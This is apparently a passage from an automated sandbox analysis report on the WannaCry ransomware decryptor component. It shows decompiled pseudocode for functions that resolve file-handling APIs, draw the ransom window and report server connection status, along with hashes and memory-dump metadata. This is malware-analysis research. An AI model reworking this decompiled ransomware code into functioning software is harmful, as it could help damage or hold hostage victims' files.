                                                      0x00406c03
                                                      0x00406c10

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                                      • String ID: English$m_%s.wnry$msg\
                                                      • API String ID: 3713669620-4206458537
                                                      • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                                      • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}





                                                      0x00402c48
                                                      0x00402d1d
                                                      0x00402d20
                                                      0x00402c4e
                                                      0x00402c55
                                                      0x00402c69
                                                      0x00402c6d
                                                      0x00000000
                                                      0x00402c73
                                                      0x00402c88
                                                      0x00402c95
                                                      0x00402ca2
                                                      0x00402caf
                                                      0x00402cbc
                                                      0x00402cc9
                                                      0x00402cce
                                                      0x00402cd6
                                                      0x00402cde
                                                      0x00000000
                                                      0x00402d16
                                                      0x00402d1c
                                                      0x00402d1c
                                                      0x00402cde
                                                      0x00402c57
                                                      0x00402c5d
                                                      0x00402c5d
                                                      0x00402c55

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                                      • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                      • API String ID: 2238633743-1294736154
                                                      • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                                      • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0();
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152);
					L00412DE2();
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}























































                                                      0x00405580
                                                      0x00405582
                                                      0x0040558d
                                                      0x0040558e
                                                      0x0040559e
                                                      0x004055a9
                                                      0x004055b2
                                                      0x004055b4
                                                      0x004055b8
                                                      0x004055bd
                                                      0x004055c1
                                                      0x004055d0
                                                      0x004055d5
                                                      0x004055de
                                                      0x004055e5
                                                      0x004055ed
                                                      0x004055f1
                                                      0x004055f9
                                                      0x004055fd
                                                      0x00405601
                                                      0x00405605
                                                      0x0040560d
                                                      0x0040561a
                                                      0x00405620
                                                      0x00405626
                                                      0x0040562a
                                                      0x0040563f
                                                      0x00405641
                                                      0x0040564c
                                                      0x00405652
                                                      0x00405657
                                                      0x0040565c
                                                      0x0040565d
                                                      0x00405664
                                                      0x00405666
                                                      0x00405666
                                                      0x00405669
                                                      0x0040566a
                                                      0x0040566e
                                                      0x0040566f
                                                      0x00405677
                                                      0x0040567c
                                                      0x0040567e
                                                      0x00405686
                                                      0x0040568c
                                                      0x0040569e
                                                      0x004056a4
                                                      0x004056a8
                                                      0x004056ac
                                                      0x004056b2
                                                      0x004056bc
                                                      0x004056c8
                                                      0x004056e7
                                                      0x0040570b
                                                      0x00405719
                                                      0x0040571c
                                                      0x0040571e
                                                      0x00405721
                                                      0x00000000
                                                      0x00405723
                                                      0x00405723
                                                      0x00405729
                                                      0x0040572d
                                                      0x00000000
                                                      0x0040572f
                                                      0x0040572f
                                                      0x00405734
                                                      0x00000000
                                                      0x00405736
                                                      0x0040573a
                                                      0x0040574c
                                                      0x0040574e
                                                      0x00405753
                                                      0x00405757
                                                      0x00000000
                                                      0x00405757
                                                      0x0040573a
                                                      0x00405734
                                                      0x0040572d
                                                      0x00405729
                                                      0x00000000
                                                      0x0040575b
                                                      0x00405763
                                                      0x00405766
                                                      0x00405766
                                                      0x004056b2
                                                      0x00405770
                                                      0x00405770
                                                      0x00405777
                                                      0x00405779
                                                      0x00405779
                                                      0x0040577c
                                                      0x00405781
                                                      0x00405782
                                                      0x0040578b
                                                      0x0040579b
                                                      0x004057a2
                                                      0x004057a8
                                                      0x004057b0
                                                      0x004057b9
                                                      0x004057c4
                                                      0x004057c4
                                                      0x004057d3
                                                      0x004057e0

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                                      • String ID:
                                                      • API String ID: 1233696098-0
                                                      • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                                      • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}
























































                                                      0x00408d70
                                                      0x00408d70
                                                      0x00408d72
                                                      0x00408d7d
                                                      0x00408d7e
                                                      0x00408d88
                                                      0x00408d8d
                                                      0x00408d92
                                                      0x00408d9f
                                                      0x00408dab
                                                      0x00408daf
                                                      0x00408dc5
                                                      0x00408dd6
                                                      0x00408dd8
                                                      0x00408dde
                                                      0x00408de2
                                                      0x00408de6
                                                      0x00408def
                                                      0x00408df1
                                                      0x00408df5
                                                      0x00408df8
                                                      0x00408e05
                                                      0x00408e07
                                                      0x00408e09
                                                      0x00408e09
                                                      0x00408e0d
                                                      0x00408e10
                                                      0x00408e14
                                                      0x00408e21
                                                      0x00408e28
                                                      0x00408e2a
                                                      0x00408e2a
                                                      0x00408e16
                                                      0x00408e16
                                                      0x00408e16
                                                      0x00408e31
                                                      0x00408e44
                                                      0x00408e48
                                                      0x00408e4a
                                                      0x00408e4a
                                                      0x00408e5a
                                                      0x00408e5c
                                                      0x00408e5c
                                                      0x00408e67
                                                      0x00408e6e
                                                      0x00408e75
                                                      0x00408e81
                                                      0x00408e89
                                                      0x00408e8d
                                                      0x00408e91
                                                      0x00408e93
                                                      0x00408e97
                                                      0x00408e9b
                                                      0x00408e9d
                                                      0x00408ea1
                                                      0x00408ea5
                                                      0x00408eaa
                                                      0x00408eae
                                                      0x00408ec2
                                                      0x00408ed6
                                                      0x00408ed8
                                                      0x00408ed8
                                                      0x00408ed6
                                                      0x00408eea
                                                      0x00408eec
                                                      0x00408ef3
                                                      0x00408ef5
                                                      0x00408efe
                                                      0x00408f02
                                                      0x00408f06
                                                      0x00408f0e
                                                      0x00408f18
                                                      0x00408f1f
                                                      0x00408f26
                                                      0x00408f2a
                                                      0x00408f31
                                                      0x00408f38
                                                      0x00408f3e
                                                      0x00408f42
                                                      0x004090b6
                                                      0x004090b6
                                                      0x004090c2
                                                      0x004090ca
                                                      0x004090d7
                                                      0x004090e1
                                                      0x00408f48
                                                      0x00408f51
                                                      0x00408f51
                                                      0x00408f55
                                                      0x00408f60
                                                      0x00408f65
                                                      0x00408f6a
                                                      0x00408f6e
                                                      0x00408f70
                                                      0x00408f74
                                                      0x00408f78
                                                      0x00408f7f
                                                      0x00408f8b
                                                      0x00408f8d
                                                      0x00408f96
                                                      0x00408f9f
                                                      0x00408fa2
                                                      0x00408fa2
                                                      0x00408fa6
                                                      0x00408fad
                                                      0x00408fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00408fb9
                                                      0x00408fbb
                                                      0x00408fbb
                                                      0x00408fbf
                                                      0x00408fc4
                                                      0x00408fc6
                                                      0x00408fc6
                                                      0x00408fd0
                                                      0x00408fe5
                                                      0x00408fe9
                                                      0x00408ffa
                                                      0x00409001
                                                      0x00409005
                                                      0x00409021
                                                      0x00409022
                                                      0x0040907e
                                                      0x00409085
                                                      0x00409086
                                                      0x00409024
                                                      0x0040902a
                                                      0x0040902f
                                                      0x00409043
                                                      0x0040904e
                                                      0x00409054
                                                      0x0040905e
                                                      0x00409068
                                                      0x00409068
                                                      0x00409099
                                                      0x0040909f
                                                      0x0040909f
                                                      0x004090a3
                                                      0x004090ac
                                                      0x004090b0
                                                      0x00408f4a
                                                      0x00000000
                                                      0x00408f4a
                                                      0x004090b0
                                                      0x00000000
                                                      0x0040909d
                                                      0x0040909d
                                                      0x00000000
                                                      0x0040909d
                                                      0x00408f51

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                                      • String ID: DZA
                                                      • API String ID: 2487345631-3378329814
                                                      • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                                      • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 65%
                                                      			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27);
							L00412BAE();
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}












                                                      0x00401601
                                                      0x00401609
                                                      0x0040160d
                                                      0x00401612
                                                      0x00401614
                                                      0x004016e7
                                                      0x00401737
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004016e9
                                                      0x004016e9
                                                      0x004016ec
                                                      0x004016f5
                                                      0x004016fc
                                                      0x00401710
                                                      0x0040171c
                                                      0x0040171d
                                                      0x0040171e
                                                      0x0040171f
                                                      0x00401729
                                                      0x00401731
                                                      0x00401731
                                                      0x0040161a
                                                      0x0040161a
                                                      0x0040161b
                                                      0x00401691
                                                      0x00000000
                                                      0x00401693
                                                      0x00401693
                                                      0x00401696
                                                      0x0040169f
                                                      0x004016a6
                                                      0x004016ba
                                                      0x004016c6
                                                      0x004016c7
                                                      0x004016c8
                                                      0x004016c9
                                                      0x004016d3
                                                      0x004016db
                                                      0x004016db
                                                      0x0040161d
                                                      0x0040161d
                                                      0x0040161e
                                                      0x00401743
                                                      0x00401749
                                                      0x0040174a
                                                      0x0040174b
                                                      0x0040174c
                                                      0x00401754
                                                      0x00401624
                                                      0x00401626
                                                      0x00401661
                                                      0x004016de
                                                      0x004016e1
                                                      0x00401739
                                                      0x00401739
                                                      0x00401739
                                                      0x00000000
                                                      0x00401663
                                                      0x00401663
                                                      0x00401666
                                                      0x0040166f
                                                      0x00401676
                                                      0x00401681
                                                      0x00401682
                                                      0x00401683
                                                      0x00401684
                                                      0x0040168c
                                                      0x0040168c
                                                      0x00401628
                                                      0x00401628
                                                      0x0040162b
                                                      0x00401634
                                                      0x0040163b
                                                      0x00401646
                                                      0x00401647
                                                      0x00401648
                                                      0x00401649
                                                      0x00401653
                                                      0x0040165b
                                                      0x0040165b
                                                      0x00401626
                                                      0x0040161e
                                                      0x0040161b

                                                      APIs
                                                      • #2385.MFC42 ref: 00401653
                                                      • #537.MFC42(Received response), ref: 00401634
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • #537.MFC42(Succeed), ref: 0040166F
                                                      • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                                      • #537.MFC42(Sent request), ref: 0040169F
                                                      • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                                      • #2385.MFC42 ref: 004016D3
                                                      • #537.MFC42(Connected), ref: 004016F5
                                                      • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                                      • #2385.MFC42 ref: 00401729
                                                      • #2385.MFC42(?,?,?), ref: 0040174C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
